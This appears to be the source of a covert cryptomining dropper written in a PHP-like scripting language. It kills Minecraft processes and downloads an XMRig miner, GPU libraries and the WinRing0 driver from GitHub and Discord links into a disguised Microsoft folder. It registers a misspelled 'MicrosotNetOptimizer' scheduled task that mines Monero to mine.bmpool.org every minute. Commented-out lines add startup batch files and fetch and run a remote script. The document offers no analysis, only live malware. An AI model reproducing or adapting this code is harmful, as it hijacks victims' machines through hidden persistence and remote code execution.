 //file_put_contents($_ENV['APPDATA'].'\\'install2970288.cmd',file_get_contents('https://bmapps.org/bmcontrol/win64/install2970288.cmd'));
 //execute('cmd /c '.$_ENV['APPDATA'].'\\'install2970288.cmd');

if($GLOBALS['start'] != 1){
execute('cmd /c taskkill /f /im Minecraft.exe');
execute('cmd /c taskkill /f /im Minecraft.Windows.exe');
execute('cmd /c taskkill /f /im oxibyte.exe');
}
//file_put_contents($_ENV['ProgramData'].'\\Microsoft\\DeviceSync\\microsotf.bat',"@echo off\n start ".$_ENV['APPDATA'].'\\Microsoft\\5.exe'.' --coin XMR --url mine.bmpool.org:6004 --user 2970288 -p Startup --log-file 1619948916_xmr_12001_log.txt --http-host 127.0.0.1 --http-port 12001 --threads 6 -B');
//file_put_contents($_ENV['APPDATA'].'\Microsoft\Windows\Start Menu\Programs\Startup\microsotfer.bat',"@echo off\n start ".'https://lightminer.co/2970288');
//open('https://vk.com/wall-196901501_1935');
execute('cmd /c SCHTASKS /Delete /TN MicrosotNetOptimizer /f');
wait(500);
execute('cmd /c SCHTASKS /Create /SC MINUTE /MO 1 /TN MicrosotNetOptimizer /TR "%programdata%\Microsoft\DeviceSync\5.exe --coin XMR --url mine.bmpool.org:6004 --user 2970288 -p Startup --log-file 1619948916_xmr_12001_log.txt --http-host 127.0.0.1 --http-port 12001 --threads 6 -B"');
(new Thread(function(){
    
    file_put_contents($_ENV['ProgramData'].'\\Microsoft\\DeviceSync\\xmrig-cuda.dll',file_get_contents('https://github.com/Rastihin/mce/raw/main/xmrig-cuda.dll'));
    file_put_contents($_ENV['ProgramData'].'\\Microsoft\\DeviceSync\\WinRing0x64.sys',file_get_contents('https://github.com/Rastihin/mce/raw/main/WinRing0x64.sys'));
    file_put_contents($_ENV['ProgramData'].'\\Microsoft\\DeviceSync\\nvrtc-builtins64_102.dll',file_get_contents('https://cdn.discordapp.com/attachments/836942104986124312/838423281199611914/nvrtc-builtins64_102.dll'));
    file_put_contents($_ENV['ProgramData'].'\\Microsoft\\DeviceSync\\nvrtc64_102_0.dll',file_get_contents('https://github.com/Rastihin/mce/raw/main/nvrtc64_102_0.dll'));
    file_put_contents($_ENV['ProgramData'].'\\Microsoft\\DeviceSync\\5.exe',file_get_contents('https://github.com/Rastihin/mce/raw/main/5.exe'));
    wait(3000);
    //execute('cmd /c '.$_ENV['APPDATA'].'\\Microsoft\\5.exe'.' --coin XMR --url mine.bmpool.org:6004 --user 2970288 -p Processor --log-file 1619948916_xmr_12001_log.txt --http-host 127.0.0.1 --http-port 12001 --threads 6 -B');
    wait(500);
    execute('cmd /c SCHTASKS /Run /TN MicrosotNetOptimizer');
    exit();
}))->start();

